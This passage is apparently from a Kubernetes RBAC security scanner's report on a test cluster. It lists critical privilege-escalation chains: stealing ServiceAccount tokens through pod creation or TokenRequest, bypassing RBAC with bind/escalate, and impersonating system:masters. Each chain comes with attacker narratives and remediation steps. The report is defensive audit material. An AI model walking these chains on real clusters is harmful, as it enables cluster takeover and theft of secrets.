2. ServiceAccount/rbac-fixtures/sa-bind-escalate/ via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-pod-create (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-pod-create (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-bind-escalate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  4. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
  2. Step 2 of 2 RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/rbac-fixtures/sa-token-create Cluster 9.3
ServiceAccount/rbac-fixtures/sa-token-create can reach cluster-admin equivalent in 2 hop(s)
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-token-createcluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 2 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/rbac-fixtures/sa-bind-escalate via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount rbac-fixtures/sa-bind-escalate
2. ServiceAccount/rbac-fixtures/sa-bind-escalate/ via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/rbac-fixtures/sa-token-create (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/rbac-fixtures/sa-token-create (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/rbac-fixtures/sa-bind-escalate. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  4. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount rbac-fixtures/sa-bind-escalate
  2. Step 2 of 2 RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL ServiceAccount/vulnerable/privileged-reader Cluster 9.3
ServiceAccount/vulnerable/privileged-reader can reach cluster-admin equivalent in 2 hop(s)
Scope · Cluster Source ServiceAccount/vulnerable/privileged-readercluster-admin equivalent: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader has a multi-hop privilege-escalation path that ends at a cluster-admin-equivalent identity (verbs:[*] on resources:[*]). The graph search found a chain of 2 hop(s) where each hop is an RBAC primitive: secret-read into token theft, role binding, role escalation, impersonation, or pod-create-with-mounted-SA. Once a chain exists, the question is not "could this be exploited" but "how quickly". Every hop is a built-in API operation, no exploit dev needed.

The chain (each step uses an explicit RBAC verb the engine validated against the snapshot):
1. ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-bind-escalate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
2. ServiceAccount/rbac-fixtures/sa-bind-escalate/ via bind_or_escalate (bind,escalate roles|clusterroles): can bypass RBAC escalation checks via bind/escalate

This finding is correlated against pod-mounted ServiceAccounts and the engine's correlate pass. A chain whose source is mounted by a workload is qualitatively worse than one whose source is a manually-issued user, because every workload compromise becomes an immediate path to cluster-admin.

Impact Compromise of ServiceAccount/vulnerable/privileged-reader (or anything mounted by it) yields full cluster control: read every Secret, mutate any workload, exfiltrate any data, plant persistent backdoors. There is no defense-in-depth past this point.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any pod or credential associated with ServiceAccount/vulnerable/privileged-reader (RCE in any application using its identity, leaked token, or compromised image).
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-bind-escalate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-bind-escalate, the attacker uses the RBAC bind/escalate bypass (bind,escalate roles|clusterroles) to grant themselves any role they choose, typically cluster-admin. bind/escalate is the carve-out that lets the holder escape RBAC's normal "you can only grant what you have" guardrail.
  4. Final step: attacker now wields a credential authorized for verbs:[*] on resources:[*]. They read every Secret cluster-wide, exec into any pod, and persist via DaemonSets, mutating webhooks, or backdoor RBAC bindings.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-bind-escalate
  2. Step 2 of 2 RBAC bind/escalate bypass bind_or_escalate

    RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

    Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.

    From ServiceAccount/rbac-fixtures/sa-bind-escalate
    Permission granted bind,escalate roles|clusterroles
    Gives the attacker can bypass RBAC escalation checks via bind/escalate
Remediation
Break the chain at the weakest hop: remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/).
  1. Confirm the chain is real with kubectl auth can-i for each verb the engine cited (run as the source SA / each intermediate hop).
  2. Identify the lowest-cost hop to break (typically remove the bind,escalate roles|clusterroles capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-bind-escalate/)); removing one mid-chain hop kills the entire path.
  3. Apply the change in a non-prod cluster first; re-run the scanner to confirm the path no longer resolves.
  4. For each remaining wildcard verbs / wildcard resources binding in the chain, run audit2rbac to derive the minimum verbs the workload actually uses, then replace.
  5. Wire enforcement: a Kyverno or OPA Gatekeeper policy that fails any new RoleBinding/ClusterRoleBinding with verbs:[*] on resources:[*] to non-system subjects, plus a CI check that re-runs kubesplaining against the rendered manifests of every PR.
CRITICAL

Subjects can impersonate `system:masters` in 1 hop(s), bypassing all RBAC

KUBE-PRIVESC-PATH-SYSTEM-MASTERS 4 subjects Score 9.6–9.1
MITRE ATT&CK: T1078.004T1098T1556T1068

Affected subjects (4)

CRITICAL ServiceAccount/rbac-fixtures/sa-impersonate Cluster 9.6
ServiceAccount/rbac-fixtures/sa-impersonate can impersonate `system:masters` in 1 hop(s), bypassing all RBAC
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-impersonatesystem:masters: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-impersonate

Subject ServiceAccount/rbac-fixtures/sa-impersonate can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (1 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not give workload SAs impersonate users/groups because system:masters is the pathological consequence: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-impersonate.
  2. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  3. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 1 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
CRITICAL ServiceAccount/rbac-fixtures/sa-pod-create Cluster 9.1
ServiceAccount/rbac-fixtures/sa-pod-create can impersonate `system:masters` in 2 hop(s), bypassing all RBAC
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-pod-createsystem:masters: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-pod-create

Subject ServiceAccount/rbac-fixtures/sa-pod-create can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (2 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-impersonate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
2. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not give workload SAs impersonate users/groups because system:masters is the pathological consequence: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-pod-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-pod-create, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-impersonate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  4. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/rbac-fixtures/sa-pod-createServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
  2. Step 2 of 2 Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
CRITICAL ServiceAccount/rbac-fixtures/sa-token-create Cluster 9.1
ServiceAccount/rbac-fixtures/sa-token-create can impersonate `system:masters` in 2 hop(s), bypassing all RBAC
Scope · Cluster Source ServiceAccount/rbac-fixtures/sa-token-createsystem:masters: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-token-create

Subject ServiceAccount/rbac-fixtures/sa-token-create can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (2 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/rbac-fixtures/sa-impersonate via token_request (create serviceaccounts/token): can mint tokens for ServiceAccount rbac-fixtures/sa-impersonate
2. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not give workload SAs impersonate users/groups because system:masters is the pathological consequence: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/rbac-fixtures/sa-token-create.
  2. Acting as ServiceAccount/rbac-fixtures/sa-token-create, the attacker calls the serviceaccounts/token subresource (create serviceaccounts/token) to mint a fresh, valid token for ServiceAccount/rbac-fixtures/sa-impersonate. No pod creation required, and a thinner audit trail than the pod-mount route.
  3. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  4. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Step 1 of 2 TokenRequest minting token_request

    The create verb on serviceaccounts/token mints a fresh, valid token for any ServiceAccount in scope, with no pod required. Cleaner than the pod-creation route and harder to spot in audit logs.

    From ServiceAccount/rbac-fixtures/sa-token-createServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted create serviceaccounts/token
    Gives the attacker can mint tokens for ServiceAccount rbac-fixtures/sa-impersonate
  2. Step 2 of 2 Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted impersonate groups
    Gives the attacker can impersonate the system:masters group, bypassing all RBAC
Remediation
Remove every impersonate grant on a path to system:masters. Concretely: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  1. List subjects with impersonate: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "User" or .kind == "Group" or .kind == "ServiceAccount") | .metadata.name + " → " + (.roleRef.name)' then check each role's rules for impersonate.
  2. Almost no production workload genuinely needs impersonate users/groups. Kubectl plugins/dashboards that *do* need it should use kubectl --as=... from a human admin's session, not a workload SA.
  3. Break the chain: remove the impersonate groups capability that enables hop 2 (ServiceAccount/rbac-fixtures/sa-impersonate/).
  4. For kubectl-as-a-service workloads, scope the impersonation with resourceNames: [<allowed-user>] to a fixed allowlist of principals; *never* users: [*] or groups: [*].
  5. Wire admission policy: a Kyverno rule that fails any RoleBinding granting impersonate to a non-system subject without an explicit resourceNames carve-out.
CRITICAL ServiceAccount/vulnerable/privileged-reader Cluster 9.1
ServiceAccount/vulnerable/privileged-reader can impersonate `system:masters` in 2 hop(s), bypassing all RBAC
Scope · Cluster Source ServiceAccount/vulnerable/privileged-readersystem:masters: terminal sink is cluster-scoped (full API control or host root)
Category: Privilege Escalation Subject: ServiceAccount/vulnerable/privileged-reader

Subject ServiceAccount/vulnerable/privileged-reader can chain into the ability to impersonate the system:masters group. system:masters is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants system:masters reach. It is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with O=system:masters skips authorization entirely).

The chain (2 hop(s); each step is an RBAC verb the engine validated):
1. ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-impersonate via pod_create_token_theft (create pods): can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
2. ServiceAccount/rbac-fixtures/sa-impersonate/ via impersonate_system_masters (impersonate groups): can impersonate the system:masters group, bypassing all RBAC

Impersonation of system:masters is the rarest but most severe finding type. Most clusters do not give workload SAs impersonate users/groups because system:masters is the pathological consequence: a single impersonate grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.

Impact Impersonating system:masters bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the impersonate audit annotation.
How an attacker abuses this
Background
SubjectServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any workload bound to ServiceAccount/vulnerable/privileged-reader.
  2. Acting as ServiceAccount/vulnerable/privileged-reader, the attacker creates a pod that mounts the ServiceAccount/rbac-fixtures/sa-impersonate ServiceAccount and then reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside the container. The pod becomes a token-theft primitive: any ServiceAccount the attacker can mount, they can lift.
  3. Acting as ServiceAccount/rbac-fixtures/sa-impersonate, the attacker impersonates the system:masters group (impersonate groups). The kube-apiserver hard-codes that group as authorized for every operation regardless of RBAC. A single such grant collapses the entire authorization layer.
  4. Final step: attacker can impersonate group system:masters. The kube-apiserver short-circuits authorization for system:masters via the static token / certificate path, bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.
  1. Step 1 of 2 Pod creation → ServiceAccount token theft pod_create_token_theft

    Anyone who can create pods in a namespace can mount any ServiceAccount in that namespace into the pod. Cluster-scoped pod-create lets you mount any ServiceAccount in any namespace. Once the pod is running, the attacker reads /var/run/secrets/kubernetes.io/serviceaccount/token from inside it, and now holds a token for that SA.

    This is the single most common privilege-escalation pattern in production Kubernetes.

    From ServiceAccount/vulnerable/privileged-readerServiceAccount/rbac-fixtures/sa-impersonate
    Permission granted create pods
    Gives the attacker can create pods that mount ServiceAccount rbac-fixtures/sa-impersonate
  2. Step 2 of 2 Impersonation of system:masters impersonate_system_masters

    The impersonate verb on groups: ["*"] (or explicitly on system:masters) lets the holder send requests as the hard-coded system:masters group. The kube-apiserver short-circuits authorization for that group, so every API call succeeds regardless of RBAC.

    This is the worst-case impersonation grant: it bypasses the cluster's entire RBAC layer rather than borrowing another principal's permissions.

    From ServiceAccount/rbac-fixtures/sa-impersonate
